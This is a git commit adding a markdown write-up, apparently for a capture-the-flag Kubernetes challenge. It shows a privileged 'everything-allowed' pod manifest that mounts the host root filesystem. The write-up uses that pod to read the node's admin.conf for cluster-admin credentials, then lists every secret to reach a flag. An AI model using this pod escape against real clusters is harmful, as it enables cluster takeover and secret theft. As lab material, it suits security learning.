diff options
author | Aria <me@aria.rip> | 2023-10-01 17:23:09 +0100 |
---|---|---|
committer | Aria <me@aria.rip> | 2023-10-01 17:23:09 +0100 |
commit | b5b9cf7a1f61d004d7d53584d029c19302c63ba0 (patch) | |
tree | 49c3022dccf669f9f2b905ddfbd2d16db2d10d84 /punkctf/k8s_04.md |
initial commit
Diffstat (limited to 'punkctf/k8s_04.md')
-rw-r--r-- | punkctf/k8s_04.md | 50 |
1 files changed, 50 insertions, 0 deletions
diff --git a/punkctf/k8s_04.md b/punkctf/k8s_04.md new file mode 100644 index 0000000..3212624 --- /dev/null +++ b/punkctf/k8s_04.md @@ -0,0 +1,50 @@ + +Using `kubectl auth can-i --list` we find we still can't look at secrets directly, but we can create pods now. + +These pods don't have any security policy applied, meaning there are plenty of privesc routes we can take, most of them described [here](https://bishopfox.com/blog/kubernetes-pod-privilege-escalation). + +Here is the pod i created: + +```yaml +apiVersion: v1 +kind: Pod +metadata: + name: everything-allowed-exec-pod + labels: + app: pentest +spec: + hostNetwork: true + hostPID: true + hostIPC: true + containers: + - name: everything-allowed-pod + image: busybox + imagePullPolicy: IfNotPresent + securityContext: + privileged: true + volumeMounts: + - mountPath: /host + name: noderoot + command: [ "/bin/sh", "-c", "--" ] + args: [ "while true; do sleep 30; done;" ] + volumes: + - name: noderoot + hostPath: + path: / +``` + +We can then `kubectl exec -it pod/everything-allowed-exec-pod sh` and explore the host filesystem at `/host`. + +Looking in `/host/etc/kubernetes/admin.conf` (the standard location for the cluster admin config), we get connection details to login as cluster admin: + +``` +users: +- name: kubernetes-admin + user: + client-certificate-data: <long base64 string> + client-key-data: <long base64 string> +``` + +We put this in our terminals `.kube/config`, and use it to enumerate the secrets with `kubectl get secret -A` + +We find a secret in the `kube-system` namespace, from which we get the flag `punk_{3WPF4FB37UMJV31D}` |